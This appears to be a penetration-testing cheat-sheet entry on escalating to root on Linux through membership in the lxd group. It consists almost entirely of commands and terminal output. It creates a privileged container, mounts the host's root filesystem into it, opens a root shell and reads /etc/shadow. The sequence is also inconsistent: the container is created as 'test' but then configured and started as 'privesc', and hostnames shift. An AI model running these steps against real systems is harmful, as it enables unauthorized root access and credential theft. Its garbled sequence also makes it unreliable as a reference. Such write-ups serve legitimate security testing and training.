LXD group - N/A
Privilege escalation using lxd group
test@server-01:~$ id
uid=1000(test) gid=1000(test) groups=1000(test),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd)
# Init lxd to create "root device"
test@server-01:/dev/shm$ lxd init
Would you like to use LXD clustering? (yes/no) [default=no]: n
Do you want to configure a new storage pool? (yes/no) [default=yes]: y
Name of the new storage pool [default=default]:
Name of the storage backend to use (zfs, ceph, btrfs, dir, lvm) [default=zfs]:
Create a new ZFS pool? (yes/no) [default=yes]:
Would you like to use an existing empty block device (e.g. a disk or partition)? (yes/no) [default=no]:
Size in GB of the new loop device (1GB minimum) [default=19GB]: 1
Would you like to connect to a MAAS server? (yes/no) [default=no]:
Would you like to create a new local network bridge? (yes/no) [default=yes]: no
Would you like to configure LXD to use an existing bridge or host interface? (yes/no) [default=no]:
Would you like the LXD server to be available over the network? (yes/no) [default=no]:
Would you like stale cached images to be updated automatically? (yes/no) [default=yes]: no
Would you like a YAML "lxd init" preseed to be printed? (yes/no) [default=no]:
# Create image
test@server-01:/dev/shm$ lxc init ubuntu:16.04 test -c security.privileged=true
Creating test
test@server-01:/dev/shm$ lxc image list
+-------+--------------+--------+---------------------------------------------+--------------+-----------+----------+------------------------------+
| ALIAS | FINGERPRINT | PUBLIC | DESCRIPTION | ARCHITECTURE | TYPE | SIZE | UPLOAD DATE |
+-------+--------------+--------+---------------------------------------------+--------------+-----------+----------+------------------------------+
| | 712a58368655 | no | ubuntu 16.04 LTS amd64 (release) (20211001) | x86_64 | CONTAINER | 171.55MB | Apr 28, 2022 at 7:19am (UTC) |
+-------+--------------+--------+---------------------------------------------+--------------+-----------+----------+------------------------------+
# Mount system root (/) to container
test@server-01:/dev/shm$ lxc config device add privesc whatever disk source=/ path=/mnt/root recursive=true
Device whatever added to privesc
# Start container and reap the rewards
test@server-01:/dev/shm$ lxc start privesc
test@server-01:/dev/shm$ lxc exec privesc bash
root@privesc:~# cd /mnt/root/
root@test:/mnt/root# cat etc/shadow
root:*:18913:0:99999:7:::
# Clean up
test@server-01:/dev/shm$ lxc stop privesc --force
test@server-01:/dev/shm$ lxc delete privesc
test@server-01:/dev/shm$ lxc image delete 712a58368655Last updated